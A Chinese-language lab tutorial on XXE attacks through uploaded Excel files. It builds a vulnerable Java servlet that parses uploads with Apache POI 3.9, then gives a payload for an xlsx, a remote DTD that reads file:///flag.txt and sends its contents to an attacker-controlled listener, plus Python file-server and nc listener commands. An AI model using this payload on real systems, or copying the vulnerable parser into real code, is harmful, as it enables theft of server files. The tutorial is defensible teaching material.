Excel中的XXE攻擊
一、准備階段
所需環境 idea
原理:xslx文件是由xml文件組成的,可以改成.zip的文件后綴名進行解壓,所以如果如果沒有禁用外部實體,會存在XXE漏洞。poi這個依賴可以解析excel首先是解析xml,所以導致。
打開idea,創建一個maven環境
利用servlet進行
項目結構:
紅線划掉的為多余的,將1.jsp修改為index.jsp
二、依賴
將下面這段話復制到pom.xml里
<!-- https://mvnrepository.com/artifact/org.apache.poi/poi -->
<!-- https://mvnrepository.com/artifact/org.apache.poi/poi-ooxml -->
<dependency>
<groupId>org.apache.poi</groupId>
<artifactId>poi-ooxml</artifactId>
<version>3.9</version>
</dependency>
三、解析代碼
1、解析Excel(無回顯表中數據)
fileName:ExcelData
package com.shydow.servlet;
import org.apache.poi.ss.usermodel.Cell;
import org.apache.poi.ss.usermodel.Row;
import org.apache.poi.xssf.usermodel.XSSFSheet;
import org.apache.poi.xssf.usermodel.XSSFWorkbook;
import java.io.File;
import java.io.FileInputStream;
import java.io.IOException;
public class ExcelData {
public static void main(String[] args) throws IOException, InterruptedException {
File excelFile = new File("C:\\Users\\HP\\Desktop\\ssr\\xlsx\\dnslog.xlsx");
FileInputStream in = new FileInputStream(excelFile);
XSSFWorkbook workbook = new XSSFWorkbook(in);
XSSFSheet sheet = workbook.getSheetAt(0);
int total = sheet.getLastRowNum();
for(Row row : sheet){
for (Cell cell : row){
System.out.println(cell.getStringCellValue()+" ");
}
System.out.println("");
}
}
}
3、另一種(有回顯表中數據)
package com.xxetest.demo1;
import org.apache.poi.xssf.usermodel.XSSFRow;
import org.apache.poi.xssf.usermodel.XSSFSheet;
import org.apache.poi.xssf.usermodel.XSSFWorkbook;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RestController;
import java.io.FileInputStream;
public class ExcelDataController {
private XSSFSheet sheet;
/**
* 構造函數,初始化excel數據
*
* @param filePath excel路徑
* @param sheetName sheet表名
*/
ExcelDataController(String filePath, String sheetName) throws Exception {
FileInputStream fileInputStream = null;
fileInputStream = new FileInputStream(filePath);
XSSFWorkbook sheets = new XSSFWorkbook(fileInputStream);
//獲取sheet
sheet = sheets.getSheet(sheetName);
}
//打印excel數據
public void readExcelData() {
//獲取行數
int rows = sheet.getPhysicalNumberOfRows();
for (int i = 0; i < rows; i++) {
//獲取列數
XSSFRow row = sheet.getRow(i);
int columns = row.getPhysicalNumberOfCells();
for (int j = 0; j < columns; j++) {
String cell = row.getCell(j).toString();
System.out.println(cell);
}
}
}
public static void main(String[] args) throws Exception {
ExcelDataController sheet1 = new ExcelDataController("C:\\Users\\HP\\Desktop\\ssr\\xlsx\\dnslog.xlsx", "Sheet1");
sheet1.readExcelData();
}
}
3、文件上傳(學習的狂學老師的java,https://www.kuangstudy.com/)
fileName:FileServlet
package com.xxetest.servlet;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.util.List;
import java.util.UUID;
import org.apache.commons.fileupload.FileItem;
import org.apache.commons.fileupload.FileUploadException;
import org.apache.commons.fileupload.ProgressListener;
import org.apache.commons.fileupload.disk.DiskFileItemFactory;
import org.apache.commons.fileupload.servlet.ServletFileUpload;
public class FileServlet extends HttpServlet {
protected void doPost(HttpServletRequest request, HttpServletResponse response) throws javax.servlet.ServletException, IOException {
//判斷上傳的表單是普通表單還是帶文件的表單,是返回true,否返回false;
if (!ServletFileUpload.isMultipartContent(request)){
return;//如果這是一個普通文件我們直接返回
}//如果通過了這個if,說明我們的表單是帶文件上傳的
//創建上傳文件的保存目錄,為了安全建議在WEB-INF目錄下,用戶無法訪問
String uploadpath = this.getServletContext().getRealPath("WEB-INF/Upload");//獲取上傳文件的保存路徑
File uploadfile = new File(uploadpath);
if (!uploadfile.exists()){
uploadfile.mkdir();//如果目錄不存在就創建這樣一個目錄
}
//臨時文件
//臨時路徑,如果上傳的文件超過預期的大小,我們將它存放到一個臨時目錄中,過幾天自動刪除,或者提醒用戶轉存為永久
String tmppath = this.getServletContext().getRealPath("WEB-INF/tmp");
File file = new File(tmppath);
if (!file.exists()){
file.mkdir();//如果目錄不存在就創建這樣臨時目錄
}
//處理上傳的文件一般需要通過流來獲取,我們可以通過request.getInputstream(),原生態文件上傳流獲取,十分麻煩
//但是我們都建議使用Apache的文件上傳組件來實現,common-fileupload,它需要依賴於common-io組件;
try {
//1、創建DiskFileItemFactory對象,處理文件上傳路徑或限制文件大小
DiskFileItemFactory factory = gteDiskFileItemFactory(file);
//2、獲取ServletFileUpload
ServletFileUpload upload = getServletFileUpload(factory);
//3、處理上傳文件
String uuidFileName = UUID.randomUUID().toString();
String msg = uploadParseRequest(upload,request,uploadpath,uuidFileName);
//Servlet請求轉發消息
request.setAttribute("msg",msg);
request.getRequestDispatcher("/info.jsp").forward(request,response);
ExcelData excel = new ExcelData();
excel.test(uuidFileName);
}catch (FileUploadException | InterruptedException e){
e.printStackTrace();
}
}
public static DiskFileItemFactory gteDiskFileItemFactory(File file){
//1、創建DiskFileItemFactory對象,處理文件上傳路徑或限制文件大小
DiskFileItemFactory factory = new DiskFileItemFactory();
//通過這個工廠設置一個緩沖區,當上傳的文件大小大於緩沖區的時候,將它放到臨時文件中;
factory.setSizeThreshold(1024 * 1024);//緩沖區大小為1M
factory.setRepository(file);
return factory;
}
public static ServletFileUpload getServletFileUpload(DiskFileItemFactory factory){
//2、獲取ServletFileUpload
ServletFileUpload upload = new ServletFileUpload(factory);
//監聽文件上傳進度
upload.setProgressListener(new ProgressListener() {
public void update(long pBytesRead, long lpContentLenght, int i) {
//pBytesRead:已讀取到的文件大小
//pContentLenght:文件大小
System.out.println("總大小:"+lpContentLenght+"已上傳:"+pBytesRead);
}
});
//處理亂碼問題
upload.setHeaderEncoding("UTF-8");
//設置單個文件的最大值
upload.setFileSizeMax(1024 * 1024 * 10);
//設置總共能夠上傳文件的大小
//1024 = 1kb * 1024 = 1M * 10 = 10M
upload.setSizeMax(1024 * 1024 * 10);
return upload;
}
public static String uploadParseRequest(ServletFileUpload upload,HttpServletRequest request,String uploadpath,String uuidFileName) throws IOException, FileUploadException {
String msg = "";
//3、處理上傳文件
//把前端的請求解析,封裝成一個FileItem對象
List<FileItem> fileItems = upload.parseRequest(request);
for (FileItem fileItem : fileItems) {
if (fileItem.isFormField()){ //判斷是普通表單還是帶文件的表單
//getFieldName指的是前端表單控件的name
String name = fileItem.getFieldName();
String value = fileItem.getString("UTF-8");//處理亂碼
System.out.println(name+":"+value);
}else {//判斷它是帶文件的表單
//======================處理文件=======================//
//拿到文件的名字
String uploadFileName = fileItem.getName();
System.out.println("上傳的文件名:"+uploadFileName);
if (uploadFileName.trim().equals("") || uploadFileName == null){
continue;
}
//獲得上傳的文件名,例如/img/girl/ooa.jpg,只需要ooa,其前面的后面的都不需要
String fileName = uploadFileName.substring(uploadFileName.lastIndexOf("/") + 1);
//獲得文件的后綴名
String fileExtName = uploadFileName.substring(uploadFileName.lastIndexOf(".") + 1);
/*
如果文件后綴名fileExtName不是我們所需要的
就直接return,不處理,告訴用戶文件類型不對
*/
//可以使用UUID(唯一識別的通用碼),保證文件名唯一
//UUID.randomUUID,隨機生一個唯一識別的通用碼
//網絡傳輸中的東西,都需要序列化
//pojo,實體類,如果想要在多個電腦運行,傳輸--->需要吧對象都序列化了
//JNI=java Native Interface
//implements Serializable :標記接口,JVM--->java棧 本地方法棧 native-->c++
String uuidPath= UUID.randomUUID().toString();
System.out.println("文件信息【文件名:"+fileName+"文件類型:"+fileExtName+"】");
//可以使用UUID(唯一通用識別碼)來保證文件名的統一
//=======================傳輸文件=========================//
//獲得文件上傳的流
InputStream inputStream = fileItem.getInputStream();
//創建一個文件輸出流
FileOutputStream fos = new FileOutputStream(uploadpath + "/" + uuidFileName +"."+ fileExtName);
String fileName2 = uuidFileName+fileExtName;
//創建一個緩沖區
byte[] buffer = new byte[1024 * 1024];
//判斷是否讀取完畢
int len = 0;
//如果大於0,說明還存在數據
while ((len=inputStream.read(buffer))>0){
fos.write(buffer,0,len);
}
//關閉流
fos.close();
inputStream.close();
msg = "文件上傳成功!";
fileItem.delete();//上傳成功,清除臨時文件
}
}
return msg;
}
}
4、前端
fileName:index.jsp
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<html>
<head>
<title>Title</title>
</head>
<body>
<form action="${pageContext.request.contextPath}/upload"
enctype="multipart/form-data"
method="post"
>
<input type="text" name="username"><br/>
<p><input type="file" name="file"></p>
<p></p><input type="submit">|<input type="reset"></p>
</form>
</body>
</html>
fileName:info.jsp
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<html>
<head>
<title>Title</title>
</head>
<body>
${msg}
</body>
</html>
四、攻擊准備階段
1、將你的xlsx文件的后綴名改為zip,進行解壓會得到
打開這個文件將payload加入第一行下面
payload
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://自啟的文件服務器ip:端口/owen.dtd">
%remote;]>
<root/>
上傳文件,提交顯示文件上傳成功后,dns就會被解析
結果
五、實戰階段
思路:
1、既然能解析dns,那訪問我的ip是否可以,利用xml引入外部實體,去加載我的文件
2、我的文件可不可以去讀取他的本地文件
1、按照上面說的我需要構建一個服務器
1、在你的vps(雲服務器)的/root下建立一個名為owen.dtd的文件
內容如下
<!ENTITY % file SYSTEM "file:///flag.txt">
<!ENTITY % eval "<!ENTITY % error SYSTEM 'http://監聽ip:端口/?file=%file;'>">
%eval;
%error;
就是讓他去讀取根下目錄的flag.txt 然后向我的監聽端口發送一個請求,后面file的值就是讀出來的文件內容
流程如圖
2、開啟服務
利用python語句去開啟一個服務,訪問該服務可以看到/root下的文件
python -m SimpleHTTPServer 8099
3、開啟監聽端口
nc -lvv 8090
運行代碼
提交文件
接收到請求
而且監聽端口也收到了請求
